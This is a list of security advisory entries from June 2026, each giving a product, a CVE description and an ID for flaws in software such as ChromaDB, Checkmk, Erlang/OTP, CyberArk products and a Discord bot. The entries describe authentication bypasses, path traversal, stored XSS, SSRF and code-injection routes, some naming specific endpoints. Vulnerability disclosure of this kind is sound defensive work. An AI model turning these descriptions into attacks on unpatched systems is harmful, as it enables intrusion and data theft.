| ARODLAND--Crypt::PBKDF2 | Crypt::PBKDF2 versions before 0.261630 for Perl have a weak default algorithm and number of iterations. The default algorithm is HMAC-SHA1, which should only be used for legacy systems. These versions default to using 1000 iterations. Depending on the chosen algorithm, 220,000 to 1,400,000 iterations should be used. | 2026-06-12 | not yet calculated | CVE-2026-9641 |
| authzed--spicedb | SpiceDB is an open source database system for creating and managing security-critical application permissions. From version 1.15.0 to before version 1.52.0, caveat structures with nested lists can result in improper cache reuse. This issue has been patched in version 1.52.0. | 2026-06-10 | not yet calculated | CVE-2026-46668 |
| axios--axios | Axios is a promise based HTTP client for the browser and Node.js. Prior to 0.32.0 and 1.16.0, Axios's Node.js HTTP adapter may forward a Proxy-Authorization header to a redirected origin during specific proxy-to-direct redirect flows. This affects Node.js usage, where an initial HTTP request is sent through an authenticated HTTP proxy, redirects are followed, and the redirected URL is no longer proxied. Under affected redirect shapes, the final origin can receive the proxy credential that was intended only for the outbound proxy. This vulnerability is fixed in 0.32.0 and 1.16.0. | 2026-06-11 | not yet calculated | CVE-2026-44487 |
| bitbank2--AnimatedGIF v2.2.0 | An issue was discovered in bitbank2 AnimatedGIF v2.2.0. A buffer overflow in the DecodeLZW function allows remote attackers to cause a denial of service (crash) or potentially execute arbitrary code via a crafted GIF file. | 2026-06-09 | not yet calculated | CVE-2026-30141 |
| bookcars--bookcars | Insecure permissions in bookcars v8.3 allows authenticated attackers to escalate privileges from user to admin via modifying their user type. | 2026-06-09 | not yet calculated | CVE-2026-36720 |
| bookcars--bookcars | A lack of cryptographic signature verification in the validateAccessToken function of bookcars v8.3 allows attackers to bypass authentication via a forged JWT token. | 2026-06-09 | not yet calculated | CVE-2026-36721 |
| bookcars--bookcars | An authenticated arbitrary file upload vulnerability in the /api/create-car-image component of bookcars v8.3 allows attackers to execute arbitrary code via uploading a crafted file. | 2026-06-09 | not yet calculated | CVE-2026-36722 |
| bookcars--bookcars | An unrestricted file rename vulnerability in the /api/create-user component of bookcars v8.3 allows authenticated attackers to leverage directory traversal sequences to move arbitrary files from temporary storage to arbitrary locations on the server filesystem. This enables unauthorized access to sensitive files, the overwriting of critical application files, and remote code execution (RCE). | 2026-06-09 | not yet calculated | CVE-2026-36723 |
| bookcars--bookcars | An arbitrary file deletion vulnerability in the /api/delete-temp-license/{file} endpoint of bookcars v8.3 allows unauthenticated attackers to delete arbitrary files via supplying directory traversal sequences. | 2026-06-09 | not yet calculated | CVE-2026-36726 |
| bookcars--bookcars | An insecure authentication vulnerability in the /api/social-sign-in endpoint of bookcars v8.3 allows attackers to bypass authentication via a forged JWT token. | 2026-06-09 | not yet calculated | CVE-2026-36727 |
| Broadcom--Layer 7 API Gateway | An attacker who intercepts and tampers with traffic between the client application and the API Gateway server could potentially deserialize arbitrary objects. This vulnerability could lead to broken security expectations or remote code execution. | 2026-06-10 | not yet calculated | CVE-2026-11815 |
| Broadcom--Symantec Endpoint Protection CleanWipe Removal Tool | CleanWipe Removal Tool (macOS), prior to 16.0.0.65, may be susceptible to an Local Privilege Escalation vulnerability, which is a type of issue whereby an attacker with limited privilege access on an affected system can escalate their privileges to gain administrative control. | 2026-06-10 | not yet calculated | CVE-2026-11626 |
| Camaleon CMS--Camaleon CMS | Camaleon CMS 2.9.2 contains an improper authorization vulnerability in the administrator draft autosave endpoint. A low-privileged authenticated user can send an arbitrary post_id to POST /admin/post_type/<POST_TYPE_ID>/drafts and overwrite the draft associated with another user's post. | 2026-06-12 | not yet calculated | CVE-2026-10715 |
| cerebrate--cerebrate | Cerebrate before version 1.37 contains a mass-assignment vulnerability in the generic CRUD add path. The add() handler attempted to remove an attacker-supplied id from $params before normalizing the request through __massageInput(). Because the normalized $input could still contain an id field, a user able to reach an affected add endpoint could supply an identifier that should have been server-controlled. Successful exploitation could allow creation of objects with attacker-chosen identifiers, potentially causing unauthorized data manipulation, object spoofing, inconsistent references, or disruption through identifier collisions, depending on the affected model and endpoint permissions. The issue was fixed in v1.37 by removing id from the normalized input before entity patching. | 2026-06-11 | not yet calculated | CVE-2026-53901 |
| cerebrate--cerebrate | Cerebrate before version 1.37 allowed the id primary key field to be supplied through request input during CRUD edit operations and certain custom entity patching flows. In affected entities that did not explicitly mark id as inaccessible, an authenticated attacker could submit a crafted edit request containing the id of another record, causing the save operation to update that unrelated record instead of the record identified by the route parameter. The issue affected several entity types inheriting permissive mass-assignment defaults, including User, Role, UserSetting, LocalTool, PermissionLimitation, and EnumerationCollection. Since UserSettings edit functionality was reachable by any authenticated user, exploitation could allow unauthorized modification of records within the same entity type, with impact depending on the affected endpoint and writable fields. Cerebrate 1.37 fixes this by stripping id from request input after marshalling callbacks and by globally marking id as inaccessible in the base AppModel entity. The discovery of those potential vulnerabilities are inherited from initial finding from Jeroen Pinoy additional support from AI-Assisted Optus 4.8 (the commit wrongly assign Claude Fable 5 as the model switched) and coordinated by Andras Iklody. | 2026-06-11 | not yet calculated | CVE-2026-53911 |
| cerebrate--cerebrate | Cerebrate before version 1.37 exposed credential material from self-registration requests. The self-registration workflow stored the registrant's hashed password in the inbox message data payload. This payload was returned unredacted through inbox index and view responses, including HTML, JSON, and CSV outputs, and could also be written unredacted into audit log entries for the inbox message. An authenticated user with sufficient privileges to access inbox entries or related audit logs could retrieve password hashes associated with pending self-registration requests. Although the exposed value is a password hash rather than a plaintext password, disclosure of password hashes may enable offline password-cracking attempts and could increase risk where users reuse passwords across systems. Cerebrate 1.37 fixes the issue by redacting sensitive password and authkey fields from inbox display/API output and recursively redacting those fields from JSON values written to audit logs, while leaving the stored registration payload intact for account creation processing. Affected component: Inbox self-registration request handling and audit logging Fixed version: Cerebrate 1.37 | 2026-06-11 | not yet calculated | CVE-2026-53912 |
| Checkmk GmbH--Checkmk | Stored cross-site scripting in the URL dashboard widget in Checkmk <2.5.0p5, <2.4.0p31, <2.3.0p48, and all 2.2.0 versions allows a user with dashboard editing permissions to store a URL with a dangerous URI scheme such as javascript: that executes scripts in other users' browsers when they view the dashboard. | 2026-06-08 | not yet calculated | CVE-2026-7186 |
| Checkmk GmbH--Checkmk | Incorrect authorization in the User Messages dashboard widget in Checkmk <2.5.0p5 causes the message-fetching endpoints to return the dashboard creator's messages rather than the viewer's, allowing an attacker who knows a valid public dashboard share token to read the issuer's personal messages by sending requests to the underlying endpoint, even without a User Messages widget present. | 2026-06-08 | not yet calculated | CVE-2026-7765 |
| Checkmk GmbH--Checkmk | Stored cross-site scripting in the global settings change log in Checkmk <2.5.0p5, <2.4.0p31, <2.3.0p48, and all 2.2.0 versions allows an administrator who can change global settings to store malicious HTML or JavaScript in changelog messages that executes in other users' browsers when they view the Activate Changes page or Audit log. | 2026-06-08 | not yet calculated | CVE-2026-8078 |
| Checkmk GmbH--Checkmk | Improper neutralization of HTML-encoded characters in the URL validation function in Checkmk <2.5.0p5, <2.4.0p31, <2.3.0p48, and all 2.2.0 versions allows an authenticated user to bypass URL validation and inject malicious URLs such as javascript: URIs, resulting in cross-site scripting when another user interacts with the crafted link. | 2026-06-08 | not yet calculated | CVE-2026-8833 |
| Checkmk GmbH--Checkmk | Stored cross-site scripting in the service discovery active check output in Checkmk <2.5.0p5, <2.4.0p31, <2.3.0p48, and all 2.2.0 versions allows an administrator who can configure active or custom checks to inject malicious HTML or JavaScript into check output that executes in the browser of an admin or a user with host read permissions when they run the check on the service discovery page. | 2026-06-08 | not yet calculated | CVE-2026-9549 |
| checkpoint--Quantum Security Gateway | A logic flow weakness in Remote Access and Mobile Access certificate validation in deprecated IKEv1 key exchange allows an unauthenticated remote attacker to bypass user authentication and establish a remote access VPN connection without a valid user password. | 2026-06-08 | not yet calculated | CVE-2026-50751 |
| Chroma--ChromaDB | A lack of authorization validation in version 0.4.17 or later of the ChromaDB Python project allows any authenticated users to arbitrarily read, write, update, or delete data in any tenant's collection regardless of which tenant they belong to. | 2026-06-12 | not yet calculated | CVE-2026-45830 |
| Chroma--ChromaDB | The SimpleRBACAuthorizationProvider authorization provider in versions 0.5.0 or later of the ChromaDB Python project evaluates whether a user holds a given permission but never checks which tenant, database, or collection that permission applies to allowing users to perform cross tenant actions. | 2026-06-12 | not yet calculated | CVE-2026-45831 |
| Chroma--ChromaDB | All V1 collection-level endpoints in ChromaDB's Python project pass None for the tenant and database to the authorization layer, allowing attackers to bypass authorization controls by using the V1 endpoints. | 2026-06-12 | not yet calculated | CVE-2026-45832 |
| Chroma--ChromaDB | A code injection vulnerability in version 0.4.17 or later of the ChromaDB Python project allows an authenticated attacker to run arbitrary code on the server by sending a malicious model repository and trust_remote_code set to true in the /api/v2/tenants/default_tenant/databases/default_database/collections/{collection_id} if they have the UPDATE_COLLECTION permission. | 2026-06-12 | not yet calculated | CVE-2026-45833 |
| Chroma--ChromaDB | A lack of authorization validation in version 1.0.0 or later of the ChromaDB Rust project allows any authenticated users to arbitrarily read, write, update, or delete data in any tenant's collection regardless of which tenant they belong to. | 2026-06-12 | not yet calculated | CVE-2026-8828 |
| cloud-hypervisor--cloud-hypervisor | Cloud Hypervisor is a Virtual Machine Monitor for Cloud workloads. From version 21.0 to before version 51.2, a guest can cause a use-after-free in the cloud-hypervisor process by submitting two virtio-block descriptor chains that reuse the same head_index while asynchronous block I/O is enabled (e.g. io_uring, aio). When the kernel completes the duplicate operation before the original, the completion path frees a bounce buffer that the kernel is still actively reading from or writing to, corrupting the freed memory. This issue has been patched in versions 51.2 and 52.0. | 2026-06-09 | not yet calculated | CVE-2026-45782 |
| Concrete CMS--Concrete CMS | Concrete CMS below 9.5.2 is vulnerable to PHP Object Injection via unserialize() calls in the in Permission, Cache, and Search components. An unauthenticated attacker may trigger arbitrary PHP object instantiation if a malicious serialized payload has been placed in the database. Thanks XananasX7 for reporting. | 2026-06-10 | not yet calculated | CVE-2026-10721 |
| CyberArk Software, a Palo Alto Networks Company--Conjur Cloud (Edge Finding only) | Idira Secrets Manager SaaS Edge versions prior to 1.8 exhibit improper access control within its internal authentication components. A remote, unauthenticated attacker could exploit this by submitting a specially crafted request. Under specific circumstances, this could allow the attacker to manipulate internal validation mechanisms, potentially leading to a bypass of identity verification and the unauthorized acquisition of an access token. CyberArk Security Bulletin: CA26-20 | 2026-06-11 | not yet calculated | CVE-2026-45177 |
| CyberArk Software, a Palo Alto Networks Company--Conjur Enterprise | Idira Secrets Manager Self-Hosted versions 13.8.0 and lower exhibit improper access control within internal cluster endpoints. A remote, authenticated attacker possessing standard node-level credentials could leverage these endpoints to potentially retrieve unauthorized secrets or cause a denial of service (DoS). CyberArk Security Bulletin: CA26-20 | 2026-06-11 | not yet calculated | CVE-2026-45178 |
| CyberArk Software, a Palo Alto Networks Company--Identity Browser Extensions | Idira Identity Browser Extension (Chrome, Firefox, and Edge builds) versions prior to 26.8.1 exhibit an origin validation flaw within its internal web-page verification routines. If an authenticated user navigates to a specially crafted webpage, this interaction could potentially allow a remote attacker to trigger unauthorized application interaction or execution parameters within the context of that authenticated browser session. CyberArk Security Bulletin: CA26-21 | 2026-06-11 | not yet calculated | CVE-2026-45173 |
| CyberArk Software, a Palo Alto Networks Company--Idira Endpoint Privilege Manager | Idira Endpoint Privilege Manager Linux Agent versions prior to 26.5 allow a local attacker to potentially compromise the agent daemon initialization. CyberArk Security Bulletin: CA26-19 | 2026-06-11 | not yet calculated | CVE-2026-45174 |
| CyberArk Software, a Palo Alto Networks Company--Idira Endpoint Privilege Manager | Idira Endpoint Privilege Manager Agent versions prior to 26.5 exhibit improper access control within internal agent validation processes. A local attacker could potentially bypass built-in security controls or cryptographic validations. Under specific circumstances, this could allow the attacker to circumvent agent self-defense mechanisms and execute unauthorized operations. CyberArk Security Bulletin: CA26-19 | 2026-06-11 | not yet calculated | CVE-2026-45175 |
| CyberArk Software, a Palo Alto Networks Company--Idira Endpoint Privilege Manager | Idira Endpoint Privilege Manager Agent versions prior to 26.5 exhibit improper access control within high-privileged agent components. A local, low-privileged attacker could exploit this by manipulating an internal communication mechanism or file operation. Under specific circumstances, this could potentially allow the attacker to bypass permission restrictions and execute unauthorized local actions with elevated privileges. CyberArk Security Bulletin: CA26-19 | 2026-06-11 | not yet calculated | CVE-2026-45176 |
| CyberArk Software, a Palo Alto Networks Company--PAM Self-Hosted, Privilege Cloud | Due to incomplete input validation in Idira Privileged Session Manager for SSH (PSMP) versions prior to 15.0.2, 14.6.3, 14.2.5, and 14.0.6, an authenticated, low-privileged user could potentially execute arbitrary commands on the PSMP host. CyberArk Security Bulletins: CA26-17 and CA26-18 | 2026-06-11 | not yet calculated | CVE-2026-45172 |
| CyberArk Software, a Palo Alto Networks Company--PAM SH Connector | Idira Privilege Cloud Connector versions prior 1.1.100504 under specific conditions and configuration scenarios, TLS certificate validation may not be fully enforced. CyberArk Security Bulletin: CA26-17 | 2026-06-12 | not yet calculated | CVE-2026-45170 |
| CyberArk Software, a Palo Alto Networks Company--PAM SH Vault | Idira Privileged Access Manager (PAM) Self-Hosted Vault versions prior to 15.0.3, 14.6.5, 14.2.7, and 14.0.8 exhibit a validation vulnerability. Under specific circumstances and configuration scenarios, processing unexpected input could potentially lead to an unexpected service termination, resulting in a localized denial of service (DoS). CyberArk Security Bulletin: CA26-17 | 2026-06-12 | not yet calculated | CVE-2026-45169 |
| CyberArk Software, a Palo Alto Networks Company--Privileged Session Manager, Vault | Incomplete input validation and improperly configured folder permissions within Idira Privileged Session Manager (PSM) versions prior to 15.0.3, 14.6.3, 14.2.5, and 14.0.5, an authenticated, low-privileged user could potentially execute arbitrary code. CyberArk Security Bulletin: CA26-17 and CA26-18 | 2026-06-11 | not yet calculated | CVE-2026-45171 |
| Dahua--IPC | A vulnerability has been found in some Dahua products. An attacker may obtain the device's CA root certificate. If that CA is installed and trusted on client systems, the attacker could issue fraudulent certificates trusted by those clients and undermine the certificate trust chain. | 2026-06-10 | not yet calculated | CVE-2026-29114 |
| Dahua--IPC/SD | A vulnerability has been found in some Dahua products could allow an authenticated remote attacker to send a specially crafted packet, triggering an exception that causes the system to reboot unexpectedly, resulting in a denial of service. | 2026-06-10 | not yet calculated | CVE-2026-29115 |
| Dahua--IPC/SD/NVR/XVR/EVS/VTO/VTH/ASI/TPC | A vulnerability has been found in some Dahua products could allow an unauthenticated remote attacker to send a specially crafted packet, triggering an exception that causes the system to reboot unexpectedly, resulting in a denial of service. | 2026-06-10 | not yet calculated | CVE-2026-29116 |
| damasac thaipalliative_lte--damasac thaipalliative_lte | SQL Injection vulnerability in damasac thaipalliative_lte through version 3.0 allows remote attackers to execute arbitrary SQL commands via the idFormMain parameter to /substudy/ezform.php (line 14) and the id parameter (line 49). The parameters are concatenated directly into SQL queries without sanitization or parameterized statements. | 2026-06-11 | not yet calculated | CVE-2026-38581 |
| Debian--debusine | Debusine is an integrated solution to build, distribute and maintain a Debian-based distribution. Files managed by debusine are organized into artifacts. The endpoints that create and delete relationships between artifacts enforced no permissions checks beyond being able to see the artifacts in question. | 2026-06-10 | not yet calculated | CVE-2026-11852 |
| Debian--debusine | Debusine is an integrated solution to build, distribute and maintain a Debian-based distribution. Debian source packages (.dsc) and upload artifacts (.changes) are manifest files that name the files that make up the artifact. The parser used to read these files in Debusine accepted arbitrary fully user-controlled paths. The mergeuploads task could be abused to create arbitrary symbolic links on a worker, overwriting any file that the worker user has access to. | 2026-06-10 | not yet calculated | CVE-2026-11853 |
| DedeCMS--DedeCMS | DedeCMS V5.7.118 is vulnerable to Command Execution in file_manage_control.php. | 2026-06-09 | not yet calculated | CVE-2026-38615 |
| Devolutions--PowerShell Universal | Improper access control in Devolutions PowerShell Universal 2026.1.7 and earlier allows an unauthenticated remote attacker to obtain the OpenAPI specification of user-defined REST endpoints. | 2026-06-12 | not yet calculated | CVE-2026-8694 |
| Devolutions--Server | Improper neutralization of special elements in the built-in PAM provider password rotation templates in Devolutions Server allows an authenticated user with write access to a vault to execute arbitrary commands on the systems managed by the affected PAM provider. This issue affects : * Devolutions Server 2026.2.4.0 * Devolutions Server 2026.1.20.0 and earlier | 2026-06-08 | not yet calculated | CVE-2026-10544 |
| Devolutions--Server | Improper access control in the ticketing integration settings in Devolutions Server allows an authenticated low-privileged user to obtain cleartext credentials for configured ticketing integrations via a crafted API request. This issue affects : * Devolutions Server 2026.2.4.0 * Devolutions Server 2026.1.20.0 and earlier | 2026-06-08 | not yet calculated | CVE-2026-10786 |
| Devolutions--Server | Missing authorization in the deleted user groups API in Devolutions Server allows an authenticated low-privileged user to enumerate metadata of deleted user groups via a crafted API request. This issue affects : * Devolutions Server 2026.2.4.0 * Devolutions Server 2026.1.20.0 and earlier | 2026-06-08 | not yet calculated | CVE-2026-10787 |
| duck-organization--duck-site | In Duck Site before version 1.0.1, the repository has a deploy workflow that runs after the build workflow completes. The build workflow runs on pull requests, while the deploy workflow runs with package-write permissions and deployment secrets. If an attacker can make a pull request build satisfy the deploy workflow's main branch condition, the deploy job checks out the triggering workflow commit, builds it into a Docker image, pushes it as latest, and triggers Dokploy deployment. This can allow attacker-controlled pull request code to become the deployed production site image without being merged. This issue has been patched in version 1.0.1. | 2026-06-11 | not yet calculated | CVE-2026-47174 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.1, any guild member who can invoke slash commands can use /automod add, /automod remove, and /automod list because the command has no Discord default permission requirement and no runtime moderator permission check. An attacker can add a rule matching common text and make the bot delete other users' messages. This issue has been patched in version 1.0.1. | 2026-06-11 | not yet calculated | CVE-2026-47163 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.3, a user with Manage Server / ManageGuild, but without Manage Roles or Administrator, can configure the bot's AutoRole feature to assign an arbitrary role to new members. If the selected role has Administrator and is below the bot's highest role, the attacker can join with a controlled account and receive full server admin. This issue has been patched in version 1.0.3. | 2026-06-11 | not yet calculated | CVE-2026-47169 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.3, a normal user can create a reminder whose message contains @everyone or @here. When the reminder triggers, the bot sends the stored message back into the channel without suppressing mass mentions. If the bot has permission to mention everyone, the reminder can ping the entire server or channel later. This issue has been patched in version 1.0.3. | 2026-06-11 | not yet calculated | CVE-2026-47171 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.3, the repository has a privileged deploy workflow that runs after the unprivileged build workflow completes. The build workflow runs on pull requests, and the deploy workflow checks out the triggering workflow's head_sha, builds that code into a Docker image, pushes it as latest, and triggers production deployment. If an attacker can open a pull request from a branch named main, the deploy workflow condition can treat the PR build as deployable and build the attacker-controlled commit in a privileged deployment context. This can result in malicious container deployment and production bot compromise. This issue has been patched in version 1.0.3. | 2026-06-11 | not yet calculated | CVE-2026-47172 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.3, a normal user can create a ticket with a reason containing @everyone, @here, user mentions, or role mentions. When the ticket is created, the bot posts the attacker-controlled reason into the new ticket channel without suppressing mentions. If the bot has permission to use those mentions, the attacker can make the bot ping staff or everyone with access to the ticket channel. This issue has been patched in version 1.0.3. | 2026-06-11 | not yet calculated | CVE-2026-47173 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.4, several moderation commands echo user-controlled reason text in public bot replies without disabling mention parsing. A moderator who does not have permission to mention everyone can still make the bot send @everyone or @here if the bot has that permission. This issue has been patched in version 1.0.4. | 2026-06-11 | not yet calculated | CVE-2026-47175 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.4, a user who can configure bot settings can enable logging and choose a logging channel they can read. The bot then logs deleted and edited message contents from every channel it can see, including private channels the configuring user cannot access. This issue has been patched in version 1.0.4. | 2026-06-11 | not yet calculated | CVE-2026-47176 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.4, a user who can configure bot settings can set the ticket transcript channel to a channel they can read. When tickets are closed, the bot exports the full ticket history and sends it to that configured transcript channel. This can expose private ticket messages to users who could not read the original ticket channel. This issue has been patched in version 1.0.4. | 2026-06-11 | not yet calculated | CVE-2026-47177 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.5, the latest release suppresses mentions in several moderation commands, but /unban and /unwarn still echo user-controlled reason text in public bot messages without allowedMentions. A moderator can use @everyone or @here in the reason and make the bot send a mass ping. This issue has been patched in version 1.0.5. | 2026-06-11 | not yet calculated | CVE-2026-47188 |
| duck-organization--quest-bot | Quest Bot is an opensource modern Discord Bot built for moderation, utilities and support. Prior to version 1.0.5, the AutoMod remove flow looks up and deletes rules by global database ID without verifying that the rule belongs to the guild where the command is executed. A user can learn a victim guild's AutoMod rule ID through autocomplete, then remove that rule from another guild where they have Manage Server. This issue has been patched in version 1.0.5. | 2026-06-11 | not yet calculated | CVE-2026-47189 |
| duck-organization--questbot | Quest Bot is an opensource Discord Bot. Prior to version 1.1.6, the purge and slowmode commands check only guild-level permissions on the invoking member. They do not check the member's effective permissions in the channel where the command is run. A user denied channel-level moderation permissions can still delete messages or change slowmode through the bot. This issue has been patched in version 1.1.6. | 2026-06-12 | not yet calculated | CVE-2026-47195 |
| duck-organization--questbot | Quest Bot is an opensource Discord Bot. Prior to version 1.1.6, the automod add command trims user input but does not reject an empty result. Adding a rule containing only whitespace stores an empty word. The message listener later checks content.includes(""), which is always true, causing the bot to delete every non-bot guild message. This issue has been patched in version 1.1.6. | 2026-06-12 | not yet calculated | CVE-2026-47196 |
| duck-organization--questbot | Quest Bot is an opensource Discord Bot. Prior to version 1.1.6, a moderator with the relevant Discord permission bit can use the bot to moderate users above them in the Discord role hierarchy, as long as the bot itself outranks the target. This bypasses Discord's normal role hierarchy protections and lets lower-ranked moderators ban, kick, timeout, untimeout, warn, or rename higher-ranked users. This issue has been patched in version 1.1.6. | 2026-06-12 | not yet calculated | CVE-2026-47197 |
| duck-organization--questbot | Quest Bot is an opensource Discord Bot. Prior to version 1.1.6, the latest release suppresses mentions when creating, unbanning, unwarning, kicking, muting, and unmuting, but stored warning reasons are still printed by /warns without mention suppression. A moderator can create a warning with @everyone or @here in the reason, then make the bot later output that reason through /warns, causing a mass ping if the bot has permission. This issue has been patched in version 1.1.6. | 2026-06-12 | not yet calculated | CVE-2026-48485 |
| duck-organization--questbot | Quest Bot is an opensource Discord Bot. Prior to version 1.1.8, any user who can access the ticket panel can repeatedly create new ticket channels. The latest release still creates a new database ticket and Discord channel for every completed ticket modal submission, without checking whether the same user already has an open ticket and without applying a cooldown. This issue has been patched in version 1.1.8. | 2026-06-12 | not yet calculated | CVE-2026-49347 |
| elixir-lang--elixir | Uncontrolled Resource Consumption vulnerability in the Elixir standard library's Version module allows an attacker who controls a version string to cause a denial of service through CPU and memory exhaustion. The version parser converts numeric version components (major, minor, patch and numeric pre-release/build identifiers) to integers without bounding their length. A single large all-digit component therefore forces a super-linear, non-yielding base-10 to arbitrary-precision integer conversion (String.to_integer/1, i.e. :erlang.binary_to_integer/1) that pins a BEAM scheduler, and a larger component raises an uncaught SystemLimitError that crashes the calling process. A single moderately sized string (around one megabyte) is enough; no authentication is required. This is reachable from the public entry points Version.parse/1, Version.parse!/1, Version.match?/3, Version.compare/2, and Version.parse_requirement/1, which applications routinely call on untrusted input such as HTTP parameters, dependency-manifest fields, and package metadata. This vulnerability is associated with program files lib/version.ex and program routines 'Elixir.Version.Parser':parse_digits/2. This issue affects Elixir: from 1.5.0 before 1.20.1. | 2026-06-09 | not yet calculated | CVE-2026-49762 |
| Erlang--OTP | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Erlang OTP ssh (ssh_sftpd module) allows File Discovery. The SSH_FXP_READLINK handler in ssh_sftpd sends the raw result of file:read_link/2 to the client without calling chroot_filename/2 to strip the backend root prefix. An authenticated SFTP client can create a symlink inside the chroot pointing to /; ssh_sftpd resolves the target to the absolute backend root and stores it on disk. Reading the symlink back via SSH_FXP_READLINK returns that absolute path, for example /data/sftp, instead of the chrooted value /. The information disclosed is the absolute filesystem path of the SFTP root directory and of any symlink targets within it. No file contents, credentials, or access to paths outside the root directory are obtainable through this issue alone. This vulnerability is associated with program files lib/ssh/src/ssh_sftpd.erl. This issue affects OTP from OTP 17.0 before 29.0.2, 28.5.0.2 and 27.3.4.13 corresponding to ssh from 3.0.1 before 6.0.1, 5.5.2.1 and 5.2.11.8. | 2026-06-10 | not yet calculated | CVE-2026-48855 |
| Erlang--OTP | Sensitive Data Exposure vulnerability in Erlang OTP inets (httpc_response module) allows Retrieve Embedded Sensitive Data. The httpc client forwards the Authorization and Proxy-Authorization request headers to redirect targets without checking whether the redirect crosses an origin boundary. httpc_response:redirect/2 constructs the redirected request by updating only the host field of the header record; all other fields (including authorization and proxy_authorization) are copied verbatim. The redirect target host is never compared against the original host. autoredirect defaults to true, so this affects all httpc callers that do not explicitly disable automatic redirects. An attacker who controls a server that the victim contacts via httpc can issue a cross-origin 3xx redirect to a server they also control. The Authorization header (including Basic credentials derived from URL userinfo via httpc_request:handle_user_info/2) is forwarded to the redirect target, allowing credential theft. The same applies to the Proxy-Authorization header. This vulnerability is associated with program files lib/inets/src/http_client/httpc_response.erl. This issue affects OTP from 17.0 before 29.0.2, 28.5.0.2 and 27.3.4.13 corresponding to inets from 5.10 before 9.7.1, 9.6.2.2 and 9.3.2.6. | 2026-06-10 | not yet calculated | CVE-2026-48856 |
| Erlang--OTP | Server-Side Request Forgery (SSRF) vulnerability in Erlang/OTP ftp (ftp_internal module) allows FTP bounce attacks and SSRF via an unvalidated PASV response IP address. The ftp_internal:handle_ctrl_result/2 PASV handler (mode=passive, ipfamily=inet, ftp_extension=false) extracts the IP address from the server's 227 response and passes it directly to gen_tcp:connect/4 without validating it against the control connection peer address. The adjacent EPSV handlers correctly call peername(CSock) to derive the IP from the control connection, but the PASV handler does not. A malicious or compromised FTP server can redirect the client's data connection to an arbitrary internal host and port. On read operations (ftp:ls/1,2, ftp:nlist/1,2, ftp:recv/2,3), data from the redirected target is returned to the caller. On write operations (ftp:send/2,3, ftp:append/2,3), file content is sent to the redirected target. This enables SSRF against internal hosts, cloud metadata endpoints, and FTP bounce attacks against third-party hosts. The vulnerable path is the default configuration (mode=passive, ipfamily=inet, ftp_extension=false). RFC 2577 section 3 explicitly recommends validating the PASV response IP against the control connection peer. The ftp application is deprecated and scheduled for removal in OTP-30. This vulnerability is associated with program files lib/inets/src/ftp/ftp_internal.erl (inets 5.10.4 through 6.5, OTP 17.4 through 20.3) and lib/ftp/src/ftp_internal.erl (ftp 1.0 and later, OTP 21.0 and later). This issue affects OTP from OTP 17.4 before 29.0.2, 28.5.0.2 and 27.3.4.13 corresponding to inets from 5.10.4 before 7.0 and ftp from 1.0 before 1.2.6, 1.2.4.1 and 1.2.3.1. | 2026-06-10 | not yet calculated | CVE-2026-48858 |
| Erlang--OTP | Observable Timing Discrepancy vulnerability in Erlang/OTP ssh (ssh_auth, ssh_options modules) allows unauthenticated remote username enumeration via timing side-channel in password authentication. When the SSH daemon is configured with the user_passwords or password option, ssh_auth:check_password/3 performs a PBKDF2-SHA256 computation with 600,000 iterations (~300ms) for valid usernames, but returns immediately (~0ms) for invalid usernames via the ssh_options:get_password_option/2 path. This timing difference is detectable in a single authentication attempt and allows an unauthenticated attacker to distinguish valid from invalid usernames. The user_passwords and password options are documented as intended for test purposes; the recommended alternative is pwdfun, which is not affected by this vulnerability. This vulnerability is associated with program files lib/ssh/src/ssh_auth.erl and lib/ssh/src/ssh_options.erl. This issue affects OTP from OTP 29.0 before 29.0.2 corresponding to ssh from 6.0 before 6.0.1. | 2026-06-10 | not yet calculated | CVE-2026-48859 |
| Erlang--OTP | Reliance on IP Address for Authentication vulnerability in Erlang/OTP ssl (inet_tls_dist module) allows unauthenticated bypass of the distribution-over-TLS LAN allowlist. The inet_tls_dist:check_ip/1 function, which enforces a LAN allowlist for Erlang distribution over TLS, calls inet:sockname/1 instead of inet:peername/1 to obtain the peer's IP address. Because inet:sockname/1 returns the local socket address, both the local IP and the supposed peer IP resolve to the same value, causing the subnet mask comparison to always succeed regardless of the actual remote address. Any holder of a CA-signed TLS certificate can therefore bypass the LAN restriction and gain full Erlang distribution access to the node, including rpc:call/4 and code:load_binary/3. This vulnerability is associated with program file lib/ssl/src/inet_tls_dist.erl. This issue affects OTP from OTP 26.0 before 29.0.2, 28.5.0.2 and 27.3.4.13 corresponding to ssl from 11.0 before 11.7.2, 11.6.0.2 and 11.2.12.9. | 2026-06-10 | not yet calculated | CVE-2026-48860 |
| Erlang--OTP | Stack-based Buffer Overflow vulnerability in Erlang OTP erts (inet_drv) allows an unauthenticated remote attacker to crash the BEAM VM by sending a crafted SCTP ERROR chunk. The sctp_parse_error_chunk function in erts/emulator/drivers/common/inet_drv.c parses SCTP ERROR chunks and writes cause codes into a fixed-size stack-allocated ErlDrvTermData spec[] array without checking bounds. A remote attacker who has established an SCTP association to a listening port can send a single crafted SCTP ERROR chunk containing enough cause codes to overflow the stack buffer, crashing the VM. The attacker can only write 16-bit values interleaved with a fixed tag, so the overflow does not provide a controlled return address, limiting exploitation to Denial of Service. A crafted SCTP ERROR chunk may also leak bits and pieces of Erlang VM memory into the received error packet observed by the Erlang process. Such data is already readable by the user running the Erlang VM, so the disclosure scope is limited. This issue affects OTP from OTP 17.0 before 27.3.4.13, 28.5.0.2 and 29.0.2, corresponding to erts from 6.0 before 15.2.7.9, 16.4.0.2 and 17.0.2. | 2026-06-10 | not yet calculated | CVE-2026-49759 |
